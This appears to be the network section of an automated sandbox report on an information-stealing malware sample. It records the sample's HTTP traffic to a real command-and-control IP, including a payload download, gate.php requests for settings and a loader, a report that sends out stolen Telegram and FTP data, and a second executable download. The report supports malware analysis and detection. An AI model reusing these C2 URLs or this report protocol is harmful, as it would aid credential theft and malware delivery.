Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
- UDP Requests
-
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://128.199.63.64/deepanal/system/assets/bundle.bin
REQUEST
RESPONSE
BODY
GET /deepanal/system/assets/bundle.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Host: 128.199.63.64
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 13 Jun 2021 13:48:00 GMT
ETag: "4f1c00-5c4a5fd304400"
Accept-Ranges: bytes
Content-Length: 5184512
Content-Type: application/octet-stream
GET
200
http://128.199.63.64/deepanal/gate.php?type=settings
REQUEST
RESPONSE
BODY
GET /deepanal/gate.php?type=settings HTTP/1.1
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 656
Content-Type: text/html; charset=UTF-8
GET
200
http://128.199.63.64/deepanal/gate.php?type=ip
REQUEST
RESPONSE
BODY
GET /deepanal/gate.php?type=ip HTTP/1.1
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 15
Content-Type: text/html; charset=UTF-8
GET
200
http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
REQUEST
RESPONSE
BODY
GET /deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64
Content-Length: 35022
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:11 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
GET
200
http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3
REQUEST
RESPONSE
BODY
GET /deepanal/gate.php?type=loader&tag=traffic3 HTTP/1.1
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 136
Content-Type: text/html; charset=UTF-8
GET
200
http://128.199.63.64/hoetnaca/exps/1.exe
REQUEST
RESPONSE
BODY
GET /hoetnaca/exps/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Host: 128.199.63.64
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 17 Oct 2021 16:35:13 GMT
ETag: "422a00-5ce8f03360ba9"
Accept-Ranges: bytes
Content-Length: 4336128
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts